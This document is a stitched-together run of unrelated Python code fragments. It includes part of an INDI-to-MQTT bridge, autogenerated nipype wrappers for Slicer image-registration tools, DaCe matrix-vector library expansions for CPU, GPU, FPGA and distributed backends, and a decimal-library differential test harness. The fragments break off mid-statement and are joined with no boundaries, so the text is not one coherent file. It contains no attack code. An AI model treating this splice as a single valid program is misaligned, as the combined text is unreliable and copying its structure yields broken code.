devicename/propertyname for mqtt_id in self.sendsnoopproperties[devicename,propertyname]: snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) # and start again, waiting for a new message if devicename: self.deviceset.add(devicename) if root.tag == "delProperty": # remove this device/property from snooping records _remove(root, self.userdata) message = b'' messagetagnumber = None def inditomqtt(indiserver, mqtt_id, mqttserver, subscribe_list=[]): """Blocking call that provides the indiserver - mqtt connection. If subscribe list is empty then this function subscribes to received data from all remote mqtt_id's. If it contains a list of mqtt_id's, then only subscribes to their data. :param indiserver: Named Tuple providing the indiserver parameters :type indiserver: namedtuple :param mqtt_id: A unique string, identifying this connection :type mqtt_id: String :param mqttserver: Named Tuple providing the mqtt server parameters :type mqttserver: namedtuple :param subscribe_list: List of remote mqtt_id's to subscribe to :type subscribe_list: List """ if not MQTT_AVAILABLE: print("Error - Unable to import
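# Hedged usage sketch (added; not part of the original module). The
# indi_server()/mqtt_server() helper constructors used here are assumptions
# about the surrounding package API; only inditomqtt() itself is defined above.
def _example_inditomqtt():
    from indi_mr import inditomqtt, indi_server, mqtt_server  # assumed imports

    indi_host = indi_server(host='localhost', port=7624)    # assumed helper
    mqtt_host = mqtt_server(host='10.34.100.1', port=1883)  # assumed helper
    # Blocking call: bridge the local indiserver to the MQTT broker, identifying
    # this connection as 'indi_bridge01' and subscribing to all remote ids.
    inditomqtt(indi_host, 'indi_bridge01', mqtt_host)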
# -*- coding: utf-8 -*- # -*- coding: utf8 -*- """Autogenerated file - DO NOT EDIT If you spot a bug, please report it on the mailing list and/or change the generator.""" from nipype.interfaces.base import ( CommandLine, CommandLineInputSpec, SEMLikeCommandLine, TraitedSpec, File, Directory, traits, isdefined, InputMultiPath, OutputMultiPath, ) import os class BSplineDeformableRegistrationInputSpec(CommandLineInputSpec): iterations = traits.Int(desc="Number of iterations", argstr="--iterations %d") gridSize = traits.Int( desc="Number of grid points on interior of the fixed image. Larger grid sizes allow for finer registrations.", argstr="--gridSize %d", ) histogrambins = traits.Int( desc="Number of histogram bins to use for Mattes Mutual Information. Reduce the number of bins if a deformable registration fails. If the number of bins is too large, the estimated PDFs will be a field of impulses and will inhibit reliable registration estimation.", argstr="--histogrambins %d", ) spatialsamples = traits.Int( desc="Number of spatial samples to use in estimating Mattes Mutual Information. Larger values yield more accurate PDFs and improved registration quality.", argstr="--spatialsamples %d", ) constrain = traits.Bool( desc="Constrain the deformation to the amount specified in Maximum Deformation", argstr="--constrain ", ) maximumDeformation = traits.Float( desc="If Constrain Deformation is checked, limit the deformation to this amount.", argstr="--maximumDeformation %f", ) default = traits.Int( desc="Default pixel value used if resampling a pixel outside of the volume.", argstr="--default %d", ) initialtransform = File( desc="Initial transform for aligning the fixed and moving image. Maps positions in the fixed coordinate frame to positions in the moving coordinate frame. This transform should be an affine or rigid transform. It is used an a bulk transform for the BSpline. Optional.", exists=True, argstr="--initialtransform %s", ) FixedImageFileName = File( position=-2, desc="Fixed image to which to register", exists=True, argstr="%s" ) MovingImageFileName = File( position=-1, desc="Moving image", exists=True, argstr="%s" ) outputtransform = traits.Either( traits.Bool, File(), hash_files=False, desc="Transform calculated that aligns the fixed and moving image. Maps positions from the fixed coordinate frame to the moving coordinate frame. Optional (specify an output transform or an output volume or both).", argstr="--outputtransform %s", ) outputwarp = traits.Either( traits.Bool, File(), hash_files=False, desc="Vector field that applies an equivalent warp as the BSpline. Maps positions from the fixed coordinate frame to the moving coordinate frame. Optional.", argstr="--outputwarp %s", ) resampledmovingfilename = traits.Either( traits.Bool, File(), hash_files=False, desc="Resampled moving image to fixed image coordinate frame. Optional (specify an output transform or an output volume or both).", argstr="--resampledmovingfilename %s", ) class BSplineDeformableRegistrationOutputSpec(TraitedSpec): outputtransform = File( desc="Transform calculated that aligns the fixed and moving image. Maps positions from the fixed coordinate frame to the moving coordinate frame. Optional (specify an output transform or an output volume or both).", exists=True, ) outputwarp = File( desc="Vector field that applies an equivalent warp as the BSpline. Maps positions from the fixed coordinate frame to the moving coordinate frame. 
Optional.", exists=True, ) resampledmovingfilename = File( desc="Resampled moving image to fixed image coordinate frame. Optional (specify an output transform or an output volume or both).", exists=True, ) class BSplineDeformableRegistration(SEMLikeCommandLine): """title: BSpline Deformable Registration category: Legacy.Registration description: Registers two images together using BSpline transform and mutual information. version: 0.1.0.$Revision: 19608 $(alpha) documentation-url: http://wiki.slicer.org/slicerWiki/index.php/Documentation/4.1/Modules/BSplineDeformableRegistration contributor: <NAME> (GE) acknowledgements: This work is part of the National Alliance for Medical Image Computing (NAMIC), funded by the National Institutes of Health through the NIH Roadmap for Medical Research, Grant U54 EB005149. """ input_spec = BSplineDeformableRegistrationInputSpec output_spec = BSplineDeformableRegistrationOutputSpec _cmd = "BSplineDeformableRegistration " _outputs_filenames = { "resampledmovingfilename": "resampledmovingfilename.nii", "outputtransform": "outputtransform.txt", "outputwarp": "outputwarp.nrrd", } class AffineRegistrationInputSpec(CommandLineInputSpec): fixedsmoothingfactor = traits.Int( desc="Amount of smoothing applied to fixed image prior to registration. Default is 0 (none). Range is 0-5 (unitless). Consider smoothing the input data if there is considerable amounts of noise or the noise pattern in the fixed and moving images is very different.", argstr="--fixedsmoothingfactor %d", ) movingsmoothingfactor = traits.Int( desc="Amount of smoothing applied to moving image prior to registration. Default is 0 (none). Range is 0-5 (unitless). Consider smoothing the input data if there is considerable amounts of noise or the noise pattern in the fixed and moving images is very different.", argstr="--movingsmoothingfactor %d", ) histogrambins = traits.Int( desc="Number of histogram bins to use for Mattes Mutual Information. Reduce the number of bins if a registration fails. If the number of bins is too large, the estimated PDFs will be a field of impulses and will inhibit reliable registration estimation.", argstr="--histogrambins %d", ) spatialsamples = traits.Int( desc="Number of spatial samples to use in estimating Mattes Mutual Information. Larger values yield more accurate PDFs and improved registration quality.", argstr="--spatialsamples %d", ) iterations = traits.Int(desc="Number of iterations", argstr="--iterations %d") translationscale = traits.Float( desc="Relative scale of translations to rotations, i.e. a value of 100 means 10mm = 1 degree. (Actual scale used is 1/(TranslationScale^2)). This parameter is used to 'weight' or 'standardized' the transform parameters and their effect on the registration objective function.", argstr="--translationscale %f", ) initialtransform = File( desc="Initial transform for aligning the fixed and moving image. Maps positions in the fixed coordinate frame to positions in the moving coordinate frame. Optional.", exists=True, argstr="--initialtransform %s", ) FixedImageFileName = File( position=-2, desc="Fixed image to which to register", exists=True, argstr="%s" ) MovingImageFileName = File( position=-1, desc="Moving image", exists=True, argstr="%s" ) outputtransform = traits.Either( traits.Bool, File(), hash_files=False, desc="Transform calculated that aligns the fixed and moving image. Maps positions in the fixed coordinate frame to the moving coordinate frame. 
Optional (specify an output transform or an output volume or both).", argstr="--outputtransform %s", ) resampledmovingfilename = traits.Either( traits.Bool, File(), hash_files=False, desc="Resampled moving image to the fixed image coordinate frame. Optional (specify an output transform or an output volume or both).", argstr="--resampledmovingfilename %s", ) class AffineRegistrationOutputSpec(TraitedSpec): outputtransform = File( desc="Transform calculated that aligns the fixed and moving image. Maps positions in the fixed coordinate frame to the moving coordinate frame. Optional (specify an output transform or an output volume or both).", exists=True, ) resampledmovingfilename = File( desc="Resampled moving image to the fixed image coordinate frame. Optional (specify an output transform or an output volume or both).", exists=True, ) class AffineRegistration(SEMLikeCommandLine): """title: Affine Registration category: Legacy.Registration description: Registers two images together using an affine transform and mutual information. This module is often used to align images of different subjects or images of the same subject from different modalities. This module can smooth images prior to registration to mitigate noise and improve convergence. Many of the registration parameters require a working knowledge of the algorithm although the default parameters are sufficient for many registration tasks. version: 0.1.0.$Revision: 19608 $(alpha) documentation-url: http://wiki.slicer.org/slicerWiki/index.php/Documentation/4.1/Modules/AffineRegistration contributor: <NAME> (GE) acknowledgements: This module was developed by <NAME> while at GE Research with contributions from <NAME>. This work is part of the National Alliance for Medical Image Computing (NAMIC), funded by the National Institutes of Health through the NIH Roadmap for Medical Research, Grant U54 EB005149. 
""" input_spec = AffineRegistrationInputSpec output_spec = AffineRegistrationOutputSpec _cmd = "AffineRegistration " _outputs_filenames = { "resampledmovingfilename": "resampledmovingfilename.nii", "outputtransform": "outputtransform.txt", } class MultiResolutionAffineRegistrationInputSpec(CommandLineInputSpec): fixedImage = File( position=-2, desc="Image which defines the space into which the moving image is registered", exists=True, argstr="%s", ) movingImage = File( position=-1, desc="The transform goes from the fixed image's space into the moving image's space", exists=True, argstr="%s", ) resampledImage = traits.Either( traits.Bool, File(), hash_files=False, desc="Registration results", argstr="--resampledImage %s", ) saveTransform = traits.Either( traits.Bool, File(), hash_files=False, desc="Save the output transform from the registration", argstr="--saveTransform %s", ) fixedImageMask = File( desc="Label image which defines a mask of interest for the fixed image", exists=True, argstr="--fixedImageMask %s", ) fixedImageROI = traits.List( desc="Label image which defines a ROI of interest for the fixed image", argstr="--fixedImageROI %s", ) numIterations = traits.Int( desc="Number of iterations to run at each resolution level.", argstr="--numIterations %d", ) numLineIterations = traits.Int( desc="Number of iterations to run at each resolution level.", argstr="--numLineIterations %d", ) stepSize = traits.Float( desc="The maximum step size of the optimizer in voxels", argstr="--stepSize %f" ) stepTolerance = traits.Float( desc="The maximum step size of the optimizer in voxels", argstr="--stepTolerance %f", ) metricTolerance = traits.Float(argstr="--metricTolerance %f") class MultiResolutionAffineRegistrationOutputSpec(TraitedSpec): resampledImage = File(desc="Registration results", exists=True) saveTransform = File( desc="Save the output transform from the registration", exists=True ) class MultiResolutionAffineRegistration(SEMLikeCommandLine): """title: Robust Multiresolution Affine Registration category: Legacy.Registration description:
will be traversed in row-major order in order to bound the size of the output buffer to the tile size. The tile size on y must be larger than the latency of addition for the given data type. This expansion supports both transposed A and non-transposed A, but vectorization is only implemented for transposed A. """ # This corresponds to gemv_v2 in FBLAS environments = [] @staticmethod def expansion(node, state, sdfg, tile_size_x=None, tile_size_y=None): """ :param node: Node to expand. :param parent_state: State that the node is in. :param parent_sdfg: SDFG that the node is in. :param tile_size_x: Tile size along the dimension of the vector x. If set to None, no tiling is used, corresponding to setting the tile size equal to the full size of x. :param tile_size_y: Tile size along the dimension of the vector y. If set to None, no tiling is used, corresponding to setting the tile size equal to the full size of y. """ node.validate(sdfg, state) for e in state.in_edges(node): if e.dst_conn == "_A": desc_a = sdfg.arrays[e.data.data] elif e.dst_conn == "_x": desc_x = sdfg.arrays[e.data.data] for e in state.out_edges(node): if e.src_conn == "_y": desc_y = sdfg.arrays[e.data.data] sdfg = dace.SDFG("gemv") state = sdfg.add_state("gemv") alpha = node.alpha beta = node.beta # Create local versions of input data nodes desc_a = desc_a.clone() desc_a.transient = False sdfg.add_datadesc("_A", desc_a) desc_x = desc_x.clone() desc_x.transient = False sdfg.add_datadesc("_x", desc_x) desc_y = desc_y.clone() desc_y.transient = False sdfg.add_datadesc("_y", desc_y) if not node.transA and desc_a.dtype.veclen > 1: raise NotImplementedError( "Vectorization not implemented for non-transposed A.") # Create accesses read_a = state.add_read("_A") read_x = state.add_read("_x") if beta != 0: read_y = state.add_read("_y") write_y = state.add_write("_y") size_x = desc_x.shape[0] size_y = desc_y.shape[0] if tile_size_x is None: tile_size_x = size_x if tile_size_y is None: tile_size_y = size_y num_tiles_y = f"{size_y}/{tile_size_y}" num_tiles_x = f"{size_x}/{tile_size_x}" # Create y tile map y_tile_entry, y_tile_exit = state.add_map( "y_tiles", {"ty": f"0:{num_tiles_y}"}, schedule=dace.ScheduleType.FPGA_Device) # Create buffer sdfg.add_array("y_local", (tile_size_y, ), desc_y.dtype, storage=dace.StorageType.FPGA_Local, transient=True) y_local = state.add_access("y_local") y_local_write = state.add_access("y_local") # Initialize buffer init_entry, init_exit = state.add_map( "init", {"iy": f"0:{tile_size_y}"}, schedule=dace.ScheduleType.FPGA_Device) if beta != 0: if isinstance(desc_y, dt.Stream): subset = "0" else: subset = f"ty*{tile_size_y}+iy" init_tasklet = state.add_tasklet( "init", {"y_in"}, {"y_out"}, f"y_out = {desc_y.dtype.base_type.ctype}({beta}) * y_in") state.add_memlet_path(read_y, y_tile_entry, init_entry, init_tasklet, dst_conn="y_in", memlet=dace.Memlet(f"_y[{subset}]")) state.add_memlet_path(init_tasklet, init_exit, y_local, src_conn="y_out", memlet=dace.Memlet(f"y_local[iy]")) else: state.add_memlet_path(y_tile_entry, init_entry, memlet=dace.Memlet()) init_tasklet = state.add_tasklet("init", {}, {"y_out"}, "y_out = 0") state.add_memlet_path(init_entry, init_tasklet, memlet=dace.Memlet()) state.add_memlet_path(init_tasklet, init_exit, y_local, src_conn="y_out", memlet=dace.Memlet("y_local[iy]")) # Create x tile map x_tile_entry, x_tile_exit = state.add_map( "x_tiles", {"tx": f"0:{num_tiles_x}"}, schedule=dace.ScheduleType.FPGA_Device) # Create loop over tile size in x x_entry, x_exit = state.add_map("x", 
{"ix": f"0:{tile_size_x}"}, schedule=dace.ScheduleType.FPGA_Device) # Buffer a scalar value of x sdfg.add_array("x_local", (1, ), desc_x.dtype, transient=True, storage=dace.StorageType.FPGA_Local) x_local = state.add_access("x_local") subset = "0" if isinstance(desc_x, dt.Stream) else f"tx*{tile_size_x}+ix" state.add_memlet_path(read_x, y_tile_entry, x_tile_entry, x_entry, x_local, memlet=dace.Memlet(f"_x[{subset}]")) # Create loop over tile size in y y_entry, y_exit = state.add_map("y", {"iy": f"0:{tile_size_y}"}, schedule=dace.ScheduleType.FPGA_Device) # Do computation tasklet = state.add_tasklet("gemv", {"A_in", "x_in", "y_in"}, {"y_out"}, f"y_out = y_in + {alpha} * A_in * x_in") state.add_memlet_path(y_local, x_tile_entry, x_entry, y_entry, tasklet, dst_conn="y_in", memlet=dace.Memlet("y_local[iy]")) state.add_memlet_path(x_local, y_entry, tasklet, dst_conn="x_in", memlet=dace.Memlet("x_local[0]")) state.add_memlet_path(tasklet, y_exit, x_exit, x_tile_exit, y_local_write, src_conn="y_out", memlet=dace.Memlet("y_local[iy]")) if isinstance(desc_a, dt.Stream): subset = "0" elif node.transA: subset = f"tx * {tile_size_x} + ix, ty * {tile_size_y} + iy" else: subset = f"ty * {tile_size_y} + iy, tx * {tile_size_x} + ix" state.add_memlet_path(read_a, y_tile_entry, x_tile_entry, x_entry, y_entry, tasklet, dst_conn="A_in", memlet=dace.Memlet(f"_A[{subset}]")) # Write out tile of y write_y_entry, write_y_exit = state.add_map( "write_y", {"iy": f"0:{tile_size_y}"}, schedule=dace.ScheduleType.FPGA_Device) write_y_tasklet = state.add_tasklet("write_y", {"y_in"}, {"y_out"}, "y_out = y_in") subset = ("0" if isinstance(desc_y, dt.Stream) else f"ty * {tile_size_y} + iy") state.add_memlet_path(y_local_write, write_y_entry, write_y_tasklet, dst_conn="y_in", memlet=dace.Memlet("y_local[iy]")) state.add_memlet_path(write_y_tasklet, write_y_exit, y_tile_exit, write_y, src_conn="y_out", memlet=dace.Memlet(f"_y[{subset}]")) return sdfg @dace.library.expansion class ExpandGemvCuBLAS(ExpandTransformation): environments = [environments.cublas.cuBLAS] @staticmethod def expansion(node: 'Gemv', state, sdfg, m=None, n=None, **kwargs): node.validate(sdfg, state) ((edge_a, outer_array_a, shape_a, strides_a), (edge_x, outer_array_x, shape_x, strides_x), (edge_y, outer_array_y, shape_y, strides_y)) = _get_matmul_operands(node, state, sdfg, name_lhs="_A", name_rhs="_x", name_out="_y") dtype_a = outer_array_a.dtype.type dtype = outer_array_x.dtype.base_type veclen = outer_array_x.dtype.veclen m = m or node.m n = n or node.n if m is None: m = shape_y[0] if n is None: n = shape_x[0] transA = node.transA if strides_a[0] == 1: transA = not transA lda = strides_a[1] elif strides_a[1] == 1: lda = strides_a[0] else: warnings.warn('Matrix must be contiguous in at least ' 'one dimension. 
Falling back to pure expansion.') return ExpandGemvPure.expansion(node, state, sdfg, m=m, n=n, **kwargs) trans = 'CUBLAS_OP_N' if transA else 'CUBLAS_OP_T' if not node.transA: m, n = n, m if veclen != 1: warnings.warn('Vector GEMV not supported, falling back to pure') return ExpandGemvPure.expansion(node, state, sdfg, m=m, n=n, **kwargs) func, ctype, runtimetype = blas_helpers.cublas_type_metadata(dtype) func += 'gemv' # TODO: (alpha,beta) != (1,0) if node.alpha != 1.0 or node.beta != 0.0: raise NotImplementedError alpha = ( '__state->cublas_handle.Constants(__dace_cuda_device).%sPone()' % runtimetype) beta = ( '__state->cublas_handle.Constants(__dace_cuda_device).%sZero()' % runtimetype) code = (environments.cublas.cuBLAS.handle_setup_code(node) + f""" cublas{func}(__dace_cublas_handle, {trans}, {m}, {n}, {alpha}, _A, {lda}, _x, {strides_x[0]}, {beta}, _y, {strides_y[0]});""") tasklet = dace.sdfg.nodes.Tasklet(node.name, node.in_connectors, node.out_connectors, code, language=dace.dtypes.Language.CPP) return tasklet @dace.library.expansion class ExpandGemvOpenBLAS(ExpandTransformation): environments = [environments.openblas.OpenBLAS] @staticmethod def expansion(node: 'Gemv', state, sdfg, m=None, n=None, **kwargs): from dace.sdfg.scope import is_devicelevel_gpu if is_devicelevel_gpu(sdfg, state, node): return ExpandGemvPure.expansion(node, state, sdfg) node.validate(sdfg, state) ((edge_a, outer_array_a, shape_a, strides_a), (edge_x, outer_array_x, shape_x, strides_x), (edge_y, outer_array_y, shape_y, strides_y)) = _get_matmul_operands(node, state, sdfg, name_lhs="_A", name_rhs="_x", name_out="_y") dtype_a = outer_array_a.dtype.type dtype = outer_array_x.dtype.base_type veclen = outer_array_x.dtype.veclen m = m or node.m n = n or node.n if m is None: m = shape_y[0] if n is None: n = shape_x[0] transA = node.transA if strides_a[0] == 1: transA = not transA lda = strides_a[1] elif strides_a[1] == 1: lda = strides_a[0] else: warnings.warn('Matrix must be contiguous in at least ' 'one dimension. 
Falling back to pure expansion.') return ExpandGemvPure.expansion(node, state, sdfg, m=m, n=n, **kwargs) layout = 'CblasColMajor' trans = 'CblasNoTrans' if transA else 'CblasTrans' if not node.transA: m, n = n, m if veclen != 1: warnings.warn('Vector GEMV not supported, falling back to pure.') return ExpandGemvPure.expansion(node, state, sdfg, m=m, n=n, **kwargs) func, ctype, runtimetype = blas_helpers.cublas_type_metadata(dtype) func = func.lower() + 'gemv' code = f"""cblas_{func}({layout}, {trans}, {m}, {n}, {node.alpha}, _A, {lda}, _x, {strides_x[0]}, {node.beta}, _y, {strides_y[0]});""" tasklet = dace.sdfg.nodes.Tasklet(node.name, node.in_connectors, node.out_connectors, code, language=dace.dtypes.Language.CPP) return tasklet @dace.library.expansion class ExpandGemvMKL(ExpandTransformation): environments = [environments.intel_mkl.IntelMKL] @staticmethod def expansion(*args, **kwargs): return ExpandGemvOpenBLAS.expansion(*args, **kwargs) @dace.library.expansion class ExpandGemvPBLAS(ExpandTransformation): environments = [] @staticmethod def expansion(node: 'Gemv', state, sdfg, m=None, n=None, **kwargs): node.validate(sdfg, state) ((edge_a, outer_array_a, shape_a, strides_a), (edge_x, outer_array_x, shape_x, strides_x), (edge_y, outer_array_y, shape_y, strides_y)) = _get_matmul_operands(node, state, sdfg, name_lhs="_A", name_rhs="_x", name_out="_y") dtype_a = outer_array_a.dtype.type dtype = outer_array_x.dtype.base_type veclen = outer_array_x.dtype.veclen m = m or node.m n = n or node.n if m is None: m = shape_y[0] if n is None: n = shape_x[0] transA = node.transA Px = dace.symbol('Px', dtype=dace.int32, integer=True, positive=True) Py = dace.symbol('Py', dtype=dace.int32, integer=True, positive=True) try: sdfg.add_symbol('Px', dace.int32) sdfg.add_symbol('Py', dace.int32) except FileExistsError: pass @dace.program def _gemNv_pblas(_A: dtype[m, n], _x: dtype[n], _y: dtype[m]): lA = np.empty((m // Px, n // Py), dtype=_A.dtype) lx = np.empty((n // Px,), dtype=_x.dtype) dace.comm.BCScatter(_A, lA, (m//Px, n//Py)) dace.comm.BCScatter(_x, lx, (n//Px, 1)) ly = distr.MatMult(_A, _x, lA, lx, (m//Px, n//Py), (n//Px, 1)) dace.comm.BCGather(ly, _y, (m//Px, 1)) @dace.program def _gemTv_pblas(_A: dtype[m, n], _x: dtype[m], _y: dtype[n]): lA = np.empty((m // Px, n // Py), dtype=_A.dtype) lx = np.empty((m // Px,), dtype=_x.dtype) dace.comm.BCScatter(_A, lA, (m//Px, n//Py)) dace.comm.BCScatter(_x, lx, (m//Px, 1)) ly = distr.MatMult(_x, _A, lx, lA, (m//Px, 1), (m//Px, n//Py)) dace.comm.BCGather(ly, _y, (n//Px, 1)) # NOTE: The following is done to avoid scalar promotion, which results # in ValueError: Node type "BlockCyclicScatter" not supported for # promotion if transA: sdfg = _gemTv_pblas.to_sdfg(strict=False) else: sdfg = _gemNv_pblas.to_sdfg(strict=False) sdfg.apply_strict_transformations() return sdfg @dace.library.node class Gemv(dace.sdfg.nodes.LibraryNode): # Global properties implementations = { "pure": ExpandGemvPure, "OpenBLAS": ExpandGemvOpenBLAS, "MKL": ExpandGemvMKL, "cuBLAS": ExpandGemvCuBLAS, "FPGA_Accumulate": ExpandGemvFpgaAccumulate, "FPGA_TilesByColumn": ExpandGemvFpgaTilesByColumn, "PBLAS": ExpandGemvPBLAS } default_implementation = None # Object fields alpha = properties.SymbolicProperty(allow_none=False, default=1) beta = properties.SymbolicProperty(allow_none=False, default=0) transA = properties.Property( dtype=bool, desc="Whether to transpose A before multiplying") n = properties.SymbolicProperty(allow_none=True, default=None) m = properties.SymbolicProperty(allow_none=True, 
default=None)

    def __init__(self, name, location=None, transA=False, alpha=1, beta=0):
        super().__init__(name, location=location,
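# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original file): one way the Gemv
# library node defined above might be placed in an SDFG and lowered through a
# registered expansion. Array names, sizes, and the chosen implementation are
# assumptions for the example; the connector names _A/_x/_y follow the
# expansions above.
import dace

def build_gemv_example(M=32, N=64):
    sdfg = dace.SDFG('gemv_example')
    state = sdfg.add_state()
    sdfg.add_array('A', [M, N], dace.float32)
    sdfg.add_array('x', [N], dace.float32)
    sdfg.add_array('y', [M], dace.float32)

    node = Gemv('gemv_node', transA=False, alpha=1, beta=0)
    node.implementation = 'OpenBLAS'   # or 'pure', 'MKL', 'cuBLAS', 'PBLAS', ...
    state.add_node(node)

    state.add_edge(state.add_read('A'), None, node, '_A',
                   dace.Memlet(f'A[0:{M}, 0:{N}]'))
    state.add_edge(state.add_read('x'), None, node, '_x',
                   dace.Memlet(f'x[0:{N}]'))
    state.add_edge(node, '_y', state.add_write('y'), None,
                   dace.Memlet(f'y[0:{M}]'))

    # Replaces the library node with the tasklet/SDFG produced by the
    # selected ExpandGemv* transformation.
    sdfg.expand_library_nodes()
    return sdfg
# ---------------------------------------------------------------------------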
op1 = operands[0].dec op2 = operands[1].dec exact = getattr(op1, funcname)(op2, context=self.maxctx) # cdecimal's rounded result s = str(result.mpd) rounded = decimal.Decimal(s) self.ulpdiff += 1 return self.check_ulpdiff(exact, rounded) def resolve_underflow(self, result): """In extremely rare cases where the infinite precision result is just below etiny, cdecimal does not set Subnormal/Underflow. Example: setcontext(Context(prec=21, rounding=ROUND_UP, Emin=-55, Emax=85)) Decimal("1.00000000000000000000000000000000000000000000000" "0000000100000000000000000000000000000000000000000" "0000000000000025").ln() """ if str(result.mpd) != str(result.dec): return False # Results must be identical. if context.f.flags[cdecimal.Rounded] and \ context.f.flags[cdecimal.Inexact] and \ context.d.flags[decimal.Rounded] and \ context.d.flags[decimal.Inexact]: return True # Subnormal/Underflow may be missing. return False def exp(self, result, operands): if result.mpd.is_nan() or result.dec.is_nan(): return False if context.f._allcr: return self.resolve_underflow(result) return self.un_resolve_ulp(result, "exp", operands) def log10(self, result, operands): if result.mpd.is_nan() or result.dec.is_nan(): return False if context.f._allcr: return self.resolve_underflow(result) return self.un_resolve_ulp(result, "log10", operands) def ln(self, result, operands): if result.mpd.is_nan() or result.dec.is_nan(): return False if context.f._allcr: return self.resolve_underflow(result) return self.un_resolve_ulp(result, "ln", operands) def __pow__(self, result, operands): if operands[2] is not None: # three argument __pow__ # issue7049: third arg must fit into precision if (operands[0].mpd.is_zero() != operands[1].mpd.is_zero()): if (result.mpd == 0 or result.mpd == 1) and result.dec.is_nan(): if (not context.f.flags[cdecimal.InvalidOperation]) and \ context.d.flags[decimal.InvalidOperation]: self.powmod_zeros += 1 return True # issue7049: ideal exponent if decimal.Decimal(str(result.mpd)) == result.dec: return True elif result.mpd.is_nan() or result.dec.is_nan(): return False elif context.f.flags[cdecimal.Rounded] and \ context.f.flags[cdecimal.Inexact] and \ context.d.flags[decimal.Rounded] and \ context.d.flags[decimal.Inexact]: # decimal.py: correctly-rounded pow() return self.bin_resolve_ulp(result, "__pow__", operands) else: return False power = __pow__ def __radd__(self, result, operands): """decimal.py gives preference to the first nan""" if operands[0].mpd.is_nan() and operands[1].mpd.is_nan() and \ result.mpd.is_nan() and result.dec.is_nan(): return True return False __rmul__ = __radd__ # Fixed in 2.7.2. 
def plus(self, result, operands): """special cases for zero/ROUND_FLOOR""" if context.f.rounding == cdecimal.ROUND_FLOOR: if operands[0].mpd.is_zero(): return True return False minus = __neg__ = __pos__ = plus if py_minor <= 6: def rotate(self, result, operands): """truncate excess digits before the operation""" if len(operands[0].dec._int) > context.f.prec: return True return False shift = rotate def compare_total_mag(self, result, operands): """fixed in Python2.6.?""" if operands[0].mpd.is_nan() and operands[1].mpd.is_nan() and \ abs(result.mpd) == 1 and abs(result.dec) == 1: self.total_mag_nan += 1 return True return False compare_total = compare_total_mag def logb(self, result, operands): """fixed in Python2.6.?""" if context.f.flags[cdecimal.Rounded] and \ (not context.d.flags[decimal.Rounded]): self.logb_round_if_gt_prec += 1 return True return False def max(self, result, operands): if py_minor <= 5 or py_micro <= 1: # broken in multiple ways, fixed in 2.6.2 return True # hack, since is_nan() appears to be broken on the result if (not result.mpd.is_nan()) and 'sNaN' in result.dec.to_eng_string(): return True if context.f.flags[cdecimal.Subnormal] and \ (not context.d.flags[decimal.Subnormal]): self.max_status += 1 return True return False max_mag = max min = max min_mag = max class dHandlerObj(): """For non-decimal return values: Handle known disagreements between decimal.py and cdecimal.so.""" def __init__(self): pass def default(self, result, operands): return False __ge__ = __gt__ = __le__ = __lt__ = __str__ = __repr__ = default if py_minor >= 7: __ne__ = __eq__ = default if py_minor <= 6: def __eq__(self, result, operands): """cdecimal raises for all sNaN comparisons""" if operands[0].mpd.is_snan() or operands[1].mpd.is_snan(): return True return False __ne__ = __eq__ if py_minor <= 6: # Fixed in release26-maint, but a lot of distributed # versions do not have the fix yet. 
def is_normal(self, result, operands): # Issue7099 if operands[0].mpd.is_normal(): return True return False if py_minor <= 5: """decimal.py uses double quotes instead of single quotes.""" def __repr__(self, result, operands): return True dhandler_cdec = dHandlerCdec() def cdec_known_disagreement(result, funcname, operands): return getattr(dhandler_cdec, funcname, dhandler_cdec.default)(result, operands) dhandler_obj = dHandlerObj() def obj_known_disagreement(result, funcname, operands): return getattr(dhandler_obj, funcname, dhandler_obj.default)(result, operands) def verify(result, funcname, operands): """Verifies that after operation 'funcname' with operand(s) 'operands' result[0] and result[1] as well as the context flags have the same values.""" global EXIT_STATUS if result[0] != result[1] or not context.assert_eq_status(): if obj_known_disagreement(result, funcname, operands): return # skip known disagreements EXIT_STATUS = 1 raise CdecException(result, funcname, operands, str(context.f), str(context.d)) class cdec(object): """Joins cdecimal.so and decimal.py for redundant calculations with error checking.""" __slots__ = ['mpd', 'dec'] def __new__(cls, value=None): self = object.__new__(cls) self.mpd = None self.dec = None if value is not None: context.clear_status() if py_minor <= 6 and isinstance(value, float): self.mpd = cdecimal.Decimal.from_float(value) self.dec = decimal.Decimal.from_float(value) else: self.mpd = cdecimal.Decimal(value) self.dec = decimal_new(value) self.verify('__xnew__', (value,)) return self def verify(self, funcname, operands): """Verifies that after operation 'funcname' with operand(s) 'operands' self.mpd and self.dec as well as the context flags have the same values.""" global EXIT_STATUS mpdstr = str(self.mpd) decstr = str(self.dec) mpdstr_eng = self.mpd.to_eng_string() decstr_eng = self.dec.to_eng_string() mpd_tuple = self.mpd.as_tuple() dec_tuple = self.dec.as_tuple() if mpd_tuple != dec_tuple: # XXX if mpd_tuple[2] == 'F' and dec_tuple[2] == 'F' and \ mpd_tuple[1] == () and dec_tuple[1] == (0,): return if mpdstr != decstr or mpdstr_eng != decstr_eng or mpd_tuple != dec_tuple \ or not context.assert_eq_status(): if cdec_known_disagreement(self, funcname, operands): return # skip known disagreements EXIT_STATUS = 1 raise CdecException(self, funcname, operands, str(context.f), str(context.d)) def unaryfunc(self, funcname): "unary function returning a cdec" context.clear_status() c = cdec() c.mpd = getattr(self.mpd, funcname)() c.dec = getattr(self.dec, funcname)() c.verify(funcname, (self,)) return c def unaryfunc_ctx(self, funcname): "unary function returning a cdec, uses the context methods of decimal.py" context.clear_status() c = cdec() c.mpd = getattr(self.mpd, funcname)() c.dec = getattr(context.d, funcname)(self.dec) c.verify(funcname, (self,)) return c def obj_unaryfunc(self, funcname): "unary function returning an object other than a cdec" context.clear_status() r_mpd = getattr(self.mpd, funcname)() r_dec = getattr(self.dec, funcname)() verify((r_mpd, r_dec), funcname, (self,)) return r_mpd def binaryfunc(self, other, funcname): "binary function returning a cdec" context.clear_status() c = cdec() other_mpd = other_dec = other if isinstance(other, cdec): other_mpd = other.mpd other_dec = other.dec c.mpd = getattr(self.mpd, funcname)(other_mpd) c.dec = getattr(self.dec, funcname)(other_dec) c.verify(funcname, (self, other)) return c def binaryfunc_ctx(self, other, funcname): "binary function returning a cdec, uses the context methods of decimal.py" 
